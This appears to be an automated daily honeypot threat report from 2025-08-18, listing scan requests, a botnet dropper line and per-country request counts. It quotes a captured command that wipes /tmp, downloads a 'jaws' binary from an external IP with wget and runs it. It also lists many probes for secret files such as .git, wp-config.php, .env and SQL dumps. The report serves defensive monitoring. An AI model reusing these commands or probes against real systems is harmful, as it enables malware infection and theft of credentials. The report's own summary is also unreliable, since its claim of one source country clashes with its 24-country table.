Daily Report: 2025-08-18#
Executive summary#
interaction report on http service of various Hhoneypot around the world.
- Executive summary
- OT report simplified
- Botnet dropper behaviour
- List of request
- List of country_iso_code
executive_summary#
In today’s repport, we detected 1 stage 1 IP address(es), linked to 1 dropper URL(s).
There are 203 new requests that have never been observed before (these were added to the monitored request database.).
A total of 1696 requests were recorded during the day, originating from 1 different countries, with a peak of 1408 requests coming from GB.
ot_simplified_report#
simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.
source_country | targeted_country |
---|---|
GB | Germany |
GB | Germany |
US | Dubai |
US | Dubai |
botnet_dropper_behaviour#
remote_addr | request |
---|---|
8.219.6.49 | GET /shell?cd+/tmp;rm+-rf+*;wget+ 213.209.150.159/jaws;sh+/tmp/jaws HTTP/1.1 |
request#
The list of requests presented here are those that have not yet been yet integrated into the request database.
number_of_occurence | request | |
---|---|---|
228 | 1 | GET /runtime.*.js HTTP/1.1 |
263 | 1 | GET /site.conf HTTP/1.1 |
264 | 1 | GET /site.sql HTTP/1.1 |
275 | 1 | GET /site/adminer.php HTTP/1.1 |
276 | 1 | GET /site/.git/ HTTP/1.1 |
277 | 1 | GET /site/access.log HTTP/1.1 |
278 | 1 | GET /site/.git/HEAD HTTP/1.1 |
279 | 1 | GET /site/.gitignore HTTP/1.1 |
280 | 1 | GET /site/.git/logs/HEAD HTTP/1.1 |
291 | 1 | GET /site/app.js.bak HTTP/1.1 |
292 | 1 | GET /site/backup.sql HTTP/1.1 |
293 | 1 | GET /site/backup.tar.gz HTTP/1.1 |
294 | 1 | GET /site/bundle.js HTTP/1.1 |
298 | 1 | GET /site/db.sql HTTP/1.1 |
299 | 1 | GET /site/debug.js HTTP/1.1 |
300 | 1 | GET /site/debug.log HTTP/1.1 |
302 | 1 | GET /site/debug.php HTTP/1.1 |
305 | 1 | GET /site/dump.sql HTTP/1.1 |
306 | 1 | GET /site/dump.sql.gz HTTP/1.1 |
307 | 1 | GET /site/error.log HTTP/1.1 |
308 | 1 | GET /site/index-dev.php HTTP/1.1 |
309 | 1 | GET /site/log.txt HTTP/1.1 |
310 | 1 | GET /site/bundle.js.map HTTP/1.1 |
403 | 1 | GET /main.dev.js HTTP/1.1 |
404 | 1 | GET /main.*.js HTTP/1.1 |
424 | 1 | GET /mobile/config.json HTTP/1.1 |
454 | 1 | GET /web/error.log HTTP/1.1 |
455 | 1 | GET /web/dump.sql.gz HTTP/1.1 |
456 | 1 | GET /web/dump.sql HTTP/1.1 |
457 | 1 | GET /web/debug.php HTTP/1.1 |
458 | 1 | GET /web/debug.log HTTP/1.1 |
459 | 1 | GET /web/debug.js HTTP/1.1 |
460 | 1 | GET /web/db.sql HTTP/1.1 |
469 | 1 | GET /web/wp-config.php HTTP/1.1 |
470 | 1 | GET /web/site.sql HTTP/1.1 |
471 | 1 | GET /web/site.conf HTTP/1.1 |
494 | 1 | GET /local/phpinfo.php HTTP/1.1 |
509 | 1 | \xA0\x05\x00`\x00\x00\x00\x00\xC4\xA3\xAFH\x99V\xB6\xB4Qb\x1A\x13\xA2\xF5P\x7F\x05\x02\x00\x01\x00\x00\xA1\xAA |
522 | 1 | \xA0\x05\x00`\x00\x00\x00\x00\xC4\xA3\xAFH\x99V\xB6\xB4p\x02d\x9A\xFAU$\x04\x05\x02\x00\x01\x00\x00\xA1\xAA |
537 | 1 | \xA0\x05\x00`\x00\x00\x00\x00\xC4\xA3\xAFH\x99V\xB6\xB4\xA2\x00\x00\x00\x00\x00\x00\x00\x05\x02\x00\x01\x00\x00\xA1\xAA |
541 | 1 | GET /src/main.dev.js HTTP/1.1 |
542 | 1 | GET /src/logs/error.log HTTP/1.1 |
543 | 1 | GET /src/log.txt HTTP/1.1 |
544 | 1 | GET /src/index-dev.php HTTP/1.1 |
545 | 1 | GET /src/error.log HTTP/1.1 |
546 | 1 | GET /src/dump.sql.gz HTTP/1.1 |
547 | 1 | GET /src/dump.sql HTTP/1.1 |
548 | 1 | GET /src/debug.php HTTP/1.1 |
549 | 1 | GET /src/debug.log HTTP/1.1 |
550 | 1 | GET /src/debug.js HTTP/1.1 |
551 | 1 | GET /src/db.sql HTTP/1.1 |
554 | 1 | GET /web/index-dev.php HTTP/1.1 |
563 | 1 | GET /src/wp-config.php HTTP/1.1 |
569 | 1 | GET /sw.js HTTP/1.1 |
571 | 1 | GET /site/site.sql HTTP/1.1 |
572 | 1 | GET /site/site.conf HTTP/1.1 |
575 | 1 | GET /site/main.js HTTP/1.1 |
576 | 1 | GET /site/main.dev.js HTTP/1.1 |
577 | 1 | GET /site/logs/error.log HTTP/1.1 |
578 | 1 | GET /src/database.php HTTP/1.1 |
580 | 1 | GET /src/bundle.js.map HTTP/1.1 |
581 | 1 | GET /src/bundle.js HTTP/1.1 |
582 | 1 | GET /src/backup.tar.gz HTTP/1.1 |
584 | 1 | GET /src/app.js.bak HTTP/1.1 |
585 | 1 | GET /src/adminer.php HTTP/1.1 |
586 | 1 | GET /src/access.log HTTP/1.1 |
587 | 1 | GET /src/.gitignore HTTP/1.1 |
588 | 1 | GET /src/.git/logs/HEAD HTTP/1.1 |
589 | 1 | GET /src/.git/HEAD HTTP/1.1 |
590 | 1 | GET /src/.git/ HTTP/1.1 |
594 | 1 | GET /src/site.sql HTTP/1.1 |
595 | 1 | GET /src/site.conf HTTP/1.1 |
596 | 1 | GET /src/settings.php HTTP/1.1 |
598 | 1 | GET /src/backup.sql HTTP/1.1 |
606 | 1 | GET /web/bundle.js.map HTTP/1.1 |
607 | 1 | GET /web/bundle.js HTTP/1.1 |
608 | 1 | GET /web/backup.tar.gz HTTP/1.1 |
609 | 1 | GET /web/backup.sql HTTP/1.1 |
610 | 1 | GET /web/app.js.bak HTTP/1.1 |
611 | 1 | GET /web/adminer.php HTTP/1.1 |
613 | 1 | GET /web/.gitignore HTTP/1.1 |
614 | 1 | GET /web/.git/logs/HEAD HTTP/1.1 |
615 | 1 | GET /web/.git/HEAD HTTP/1.1 |
616 | 1 | GET /web/.git/ HTTP/1.1 |
623 | 1 | GET /web/main.js HTTP/1.1 |
624 | 1 | GET /web/main.dev.js HTTP/1.1 |
625 | 1 | GET /web/logs/error.log HTTP/1.1 |
626 | 1 | GET /web/log.txt HTTP/1.1 |
627 | 1 | GET /web/access.log HTTP/1.1 |
671 | 1 | GET /api/v1/config HTTP/1.1 |
759 | 1 | GET /.github/workflows/secrets.yml HTTP/1.1 |
763 | 1 | GET /app.js.bak HTTP/1.1 |
764 | 1 | GET /app.*.js HTTP/1.1 |
766 | 1 | GET /api/v2/profile HTTP/1.1 |
784 | 1 | GET /api/v1/token/refresh HTTP/1.1 |
849 | 1 | GET /admin/main.dev.js HTTP/1.1 |
852 | 1 | GET /admin/log.txt HTTP/1.1 |
854 | 1 | GET /admin/index-dev.php HTTP/1.1 |
858 | 1 | GET /admin/error.log HTTP/1.1 |
859 | 1 | GET /admin/dump.sql.gz HTTP/1.1 |
860 | 1 | GET /admin/dump.sql HTTP/1.1 |
865 | 1 | GET /admin/wp-config.php HTTP/1.1 |
870 | 1 | GET /admin/site.sql HTTP/1.1 |
871 | 1 | GET /admin/site.conf HTTP/1.1 |
885 | 1 | GET /admin/backup.sql HTTP/1.1 |
886 | 1 | GET /admin/app.js.bak HTTP/1.1 |
888 | 1 | GET /admin/adminer.php HTTP/1.1 |
889 | 1 | GET /admin/access.log HTTP/1.1 |
890 | 1 | GET /admin/.gitignore HTTP/1.1 |
891 | 1 | GET /admin/.git/logs/HEAD HTTP/1.1 |
892 | 1 | GET /admin/.git/HEAD HTTP/1.1 |
893 | 1 | GET /admin/.git/ HTTP/1.1 |
896 | 1 | GET /admin/main.js HTTP/1.1 |
899 | 1 | GET /admin/backup.tar.gz HTTP/1.1 |
900 | 1 | GET /admin/bundle.js HTTP/1.1 |
901 | 1 | GET /admin/bundle.js.map HTTP/1.1 |
910 | 1 | GET /admin/debug.js HTTP/1.1 |
911 | 1 | GET /admin/debug.log HTTP/1.1 |
914 | 1 | GET /core/access.log HTTP/1.1 |
915 | 1 | GET /core/.gitignore HTTP/1.1 |
916 | 1 | GET /core/.git/logs/HEAD HTTP/1.1 |
917 | 1 | GET /core/.git/HEAD HTTP/1.1 |
918 | 1 | GET /core/.git/ HTTP/1.1 |
922 | 1 | GET /core/phpinfo.php HTTP/1.1 |
923 | 1 | GET /core/main.js HTTP/1.1 |
924 | 1 | GET /core/main.dev.js HTTP/1.1 |
925 | 1 | GET /core/logs/error.log HTTP/1.1 |
926 | 1 | GET /core/log.txt HTTP/1.1 |
927 | 1 | GET /core/index-dev.php HTTP/1.1 |
928 | 1 | GET /core/error.log HTTP/1.1 |
930 | 1 | GET /core/dump.sql HTTP/1.1 |
931 | 1 | GET /core/debug.php HTTP/1.1 |
932 | 1 | GET /core/debug.log HTTP/1.1 |
933 | 1 | GET /core/debug.js HTTP/1.1 |
945 | 1 | GET /core/dump.sql.gz HTTP/1.1 |
952 | 1 | GET /config/main.js HTTP/1.1 |
953 | 1 | GET /config/main.dev.js HTTP/1.1 |
956 | 1 | GET /config/logs/error.log HTTP/1.1 |
957 | 1 | GET /config/log.txt HTTP/1.1 |
958 | 1 | GET /config/index-dev.php HTTP/1.1 |
959 | 1 | GET /config/error.log HTTP/1.1 |
960 | 1 | GET /config/dump.sql.gz HTTP/1.1 |
961 | 1 | GET /core/adminer.php HTTP/1.1 |
966 | 1 | GET /config/site.sql HTTP/1.1 |
967 | 1 | GET /config/site.conf HTTP/1.1 |
972 | 1 | GET /core/bundle.js.map HTTP/1.1 |
973 | 1 | GET /core/bundle.js HTTP/1.1 |
974 | 1 | GET /core/backup.tar.gz HTTP/1.1 |
975 | 1 | GET /core/backup.sql HTTP/1.1 |
976 | 1 | GET /core/app.js.bak HTTP/1.1 |
977 | 1 | GET /config/dump.sql HTTP/1.1 |
988 | 1 | GET /dump.sql.gz HTTP/1.1 |
1003 | 1 | GET /index.*.js HTTP/1.1 |
1004 | 1 | GET /index-dev.php HTTP/1.1 |
1014 | 1 | GET /core/db.sql HTTP/1.1 |
1027 | 1 | GET /debug.js HTTP/1.1 |
1038 | 1 | GET /core/site.conf HTTP/1.1 |
1039 | 1 | GET /core/site.sql HTTP/1.1 |
1040 | 1 | GET /core/wp-config.php HTTP/1.1 |
1043 | 1 | GET /backup/.git/ HTTP/1.1 |
1054 | 1 | GET /backup/dump.sql HTTP/1.1 |
1055 | 1 | GET /backup/debug.php HTTP/1.1 |
1056 | 1 | GET /backup/debug.log HTTP/1.1 |
1057 | 1 | GET /backup/debug.js HTTP/1.1 |
1059 | 1 | GET /backup/database.php HTTP/1.1 |
1061 | 1 | GET /backup/bundle.js.map HTTP/1.1 |
1062 | 1 | GET /backup/bundle.js HTTP/1.1 |
1063 | 1 | GET /backup/backup.tar.gz HTTP/1.1 |
1064 | 1 | GET /backup/backup.sql HTTP/1.1 |
1065 | 1 | GET /backup/app.js.bak HTTP/1.1 |
1066 | 1 | GET /backup/adminer.php HTTP/1.1 |
1067 | 1 | GET /backup/access.log HTTP/1.1 |
1068 | 1 | GET /backup/.gitignore HTTP/1.1 |
1069 | 1 | GET /backup/.git/logs/HEAD HTTP/1.1 |
1074 | 1 | GET /backup/db.sql HTTP/1.1 |
1090 | 1 | GET /backup/.git/HEAD HTTP/1.1 |
1116 | 1 | GET /config/app.js.bak HTTP/1.1 |
1117 | 1 | GET /config/adminer.php HTTP/1.1 |
1118 | 1 | GET /config/access.log HTTP/1.1 |
1121 | 1 | GET /config/.gitignore HTTP/1.1 |
1123 | 1 | GET /config/.git/HEAD HTTP/1.1 |
1124 | 1 | GET /config/.git/ HTTP/1.1 |
1129 | 1 | GET /config/debug.php HTTP/1.1 |
1130 | 1 | GET /config/debug.log HTTP/1.1 |
1131 | 1 | GET /config/debug.js HTTP/1.1 |
1132 | 1 | GET /config/db.sql HTTP/1.1 |
1134 | 1 | GET /config/bundle.js.map HTTP/1.1 |
1135 | 1 | GET /config/bundle.js HTTP/1.1 |
1136 | 1 | GET /config/backup.tar.gz HTTP/1.1 |
1137 | 1 | GET /config/backup.sql HTTP/1.1 |
1138 | 1 | GET /config/.git/logs/HEAD HTTP/1.1 |
1139 | 1 | GET /backup/site.sql HTTP/1.1 |
1140 | 1 | GET /backup/site.conf HTTP/1.1 |
1143 | 1 | GET /backup/main.js HTTP/1.1 |
1144 | 1 | GET /backup/main.dev.js HTTP/1.1 |
1145 | 1 | GET /backup/logs/error.log HTTP/1.1 |
1146 | 1 | GET /backup/log.txt HTTP/1.1 |
1147 | 1 | GET /backup/index-dev.php HTTP/1.1 |
1148 | 1 | GET /backup/error.log HTTP/1.1 |
1149 | 1 | GET /backup/dump.sql.gz HTTP/1.1 |
1165 | 1 | GET /bundle.js.map HTTP/1.1 |
1166 | 1 | GET /bundle.min.js HTTP/1.1 |
1171 | 1 | GET /.env.local.php HTTP/1.1 |
country_iso_code#
number_of_occurence | country_iso_code | |
---|---|---|
0 | 1408 | GB |
1 | 72 | US |
2 | 46 | MA |
3 | 41 | DE |
4 | 23 | NL |
5 | 19 | BG |
6 | 16 | PL |
7 | 15 | SC |
8 | 11 | HK |
9 | 8 | LT |
10 | 5 | SG |
11 | 5 | CA |
12 | 4 | ZA |
13 | 4 | CN |
14 | 3 | KR |
15 | 3 | FR |
16 | 3 | SA |
17 | 2 | CH |
18 | 2 | BE |
19 | 2 | ES |
20 | 1 | IN |
21 | 1 | RO |
22 | 1 | MC |
23 | 1 | IR |